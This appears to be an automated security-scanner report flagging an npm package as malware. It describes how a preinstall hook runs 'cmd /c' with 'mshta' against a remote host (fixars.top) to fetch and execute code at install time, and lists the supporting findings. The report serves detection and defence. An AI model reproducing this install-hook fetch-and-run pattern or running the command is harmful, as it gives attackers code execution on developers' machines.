AI Security Review
scanned 2h ago · by lpm-firewall-aiInstalling the package automatically launches Windows `mshta` against a remote HTTP host. The fetched remote content can execute in the installer user's context.
Static reason
One or more suspicious static signals were detected.; source fingerprint signature matched known malicious package; routed for review
Trigger
npm install triggers the `preinstall` lifecycle hook.
Impact
Remote code execution during dependency installation; remote payload can change without a package update.
Mechanism
preinstall shell execution of remotely hosted `mshta` payload
Attack narrative
On `npm install`, npm runs `node preinstall.js`. That file invokes `cmd /c` to launch `mshta` against `http://fixars.top`, causing Windows to retrieve and execute remotely supplied script/application content without user consent. This is a concrete install-time remote-code-execution chain, independent of the benign-looking API client source.
Rationale
The package contains an automatic preinstall hook that executes remotely hosted content through `mshta`. This is concrete malicious behavior, not merely a suspicious primitive.
Evidence
package.jsonpreinstall.jsminigptcore.jsREADME.md
Network endpoints1
fixars.top
Decision evidence
public snapshotAI called this Malicious at 99.0% confidence as Malware with low false-positive risk.
Evidence for block
- `package.json` defines `preinstall: node preinstall.js`.
- `preinstall.js` imports `child_process.exec`.
- `preinstall.js` runs `cmd /c` with `mshta http://fixars.top` during installation.
- `mshta` loads remote script/application content, enabling install-time remote code execution.
Evidence against
- `minigptcore.js` is a conventional API client and mock implementation.
- No other package files add mitigating consent or safety controls.
Behavioral surface
ChildProcessNetworkShell
UrlStrings
Source & flagged code
3 flagged · loading sourcepackage.jsonView file
•scripts.preinstall = node preinstall.js
High
Install Time Lifecycle Scripts
Package defines install-time lifecycle scripts.
package.jsonView on unpkg•scripts.preinstall = node preinstall.js
Medium
Ambiguous Install Lifecycle Script
Install-time lifecycle script is not statically allowlisted and needs review.
package.jsonView on unpkgpreinstall.jsView file
•matchType = malicious_source_fingerprint_signature
signature = 0aa7860a8556eef0
signatureType = suspicious_hashes
sourceLabel = OpenSSF malicious-packages
matchedPackage = openllmapi@4.0.2
matchedPath = preinstall.js
matchedIdentity = npm:b3BlbmxsbWFwaQ:4.0.2
similarity = 1.000
shingleOverlap = 2
summary = Malicious code in openllmapi (npm)
High
Known Malware Source Fingerprint Signature
Source fingerprint signature matches a known malicious package signature; route for source-aware review.
preinstall.jsView on unpkgFindings
2 High2 Medium2 Low
HighInstall Time Lifecycle Scriptspackage.json
HighKnown Malware Source Fingerprint Signaturepreinstall.js
MediumAmbiguous Install Lifecycle Scriptpackage.json
MediumNetwork
LowScripts Present
LowUrl Strings